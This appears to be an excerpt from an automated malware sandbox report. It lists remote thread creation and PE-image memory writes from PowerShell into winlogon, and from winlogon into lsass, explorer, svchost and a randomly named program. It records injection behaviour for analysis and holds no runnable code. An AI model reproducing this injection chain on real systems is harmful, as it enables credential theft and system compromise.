        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 51C4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 35364048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 3D9B4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 11144048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6E194048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 19564048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A63A4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: FB3B4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F944048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: DA5A4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\spoolsv.exe EIP: 6E4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: F41B4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 14124048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: B8354048
        Source: C:\Windows\System32\winlogon.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 379A4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: F1D64048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: EF544048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 351A4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 9F194048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 6C5D4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: CF264048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 58CB4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 21744048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: A22F4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 4E004048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 78704048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: B7B34048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: A8A04048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 8DE04048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: ABEB4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: B8544048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 97F44048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 7F24048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 57B54048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: EF764048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 894C4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 961C4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 1BC44048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 4A8A4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 6BB34048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 339F4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: A2F84048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: E2B34048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: D8A64048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: FBBC4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2A9B4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 37204048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: C3A94048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 29B347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 40474048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: A9A64048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: AE347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 104347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 148347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: DB347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 130347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: B9347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 11E347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 304347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2B3347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: AB347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: D1347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 22A347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: AD347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2EB347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 270347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2DB347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 240347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: B6347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 8A347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2A5347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 301347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 98347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: D8347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 115347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 235347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 298347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: A6347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: F3347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: C6347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: AF347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 7D347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 261347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 138347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 220347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2DA347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 24B347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: B6347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: AF347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: A6347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 93347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 12D347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 6F347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: AB347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 26F347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 11C347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 224347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 11E347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: CB347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 78347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: ED347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 1FD347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 240347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 7E347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2D5347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 26F347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: AF347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 14E347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 9E347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: EF347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: A6347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 12A347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 120347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: ED347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2B1347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 86347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2B6347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2AD347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2EA347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 100347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2BE347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: FD347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2DC347C
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 132A4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 80BB4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 72F4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: BFFD4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: AE454048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 20454048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: FE4F4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 3C0E4048
        Source: C:\Windows\System32\winlogon.exe | Thread created: unknown EIP: 2C604048
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1B9277D0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\lsass.exe base: 2158AEB0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E89FDC0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\dwm.exe base: 1F088910000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AC86F40000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 14785F80000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DC59CE0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 16588B90000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 17A8CDB0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F34D880000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 220C26D0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 25AF1E60000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 27BFF5C0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CEE0560000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B12B360000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D16AC90000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 244678A0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 183B0DA0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1805B940000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 191051C0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BD35360000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 21C3D9B0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 12411140000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D66E190000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 25F19560000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BCA63A0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E8FB3B0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F30F940000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 19CDA5A0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 6E0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A5F41B0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 27B14120000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BCB8350000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 17A379A0000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 250F1D60000 value starts with: 4D5A
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 11DEF540000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 23B351A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA9F190000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1D56C5D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E5CF260000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B558CB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 17A21740000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 20FA22F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD4E000000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\sihost.exe base: 17B78700000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 22EB7B30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 210A8A00000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2B28DE00000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 157ABEB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ctfmon.exe base: 25BB8540000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E697F40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\explorer.exe base: 7F20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 15C57B50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2B9EF760000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dasHost.exe base: 24C894C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21F961C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C81BC40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2904A8A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 2436BB30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\smartscreen.exe base: 172339F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 26FA2F80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25BE2B30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 272D8A60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8FBBC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1CF2A9B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20537200000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 1E3C3A90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 29B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 20E40470000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 238A9A60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1040000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1480000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: DB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1300000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3040000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D10000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 22A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2700000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 8A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2A50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3010000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 980000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1150000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2350000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2980000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: F30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: C60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 value starts with: 4D5AJump to behavior
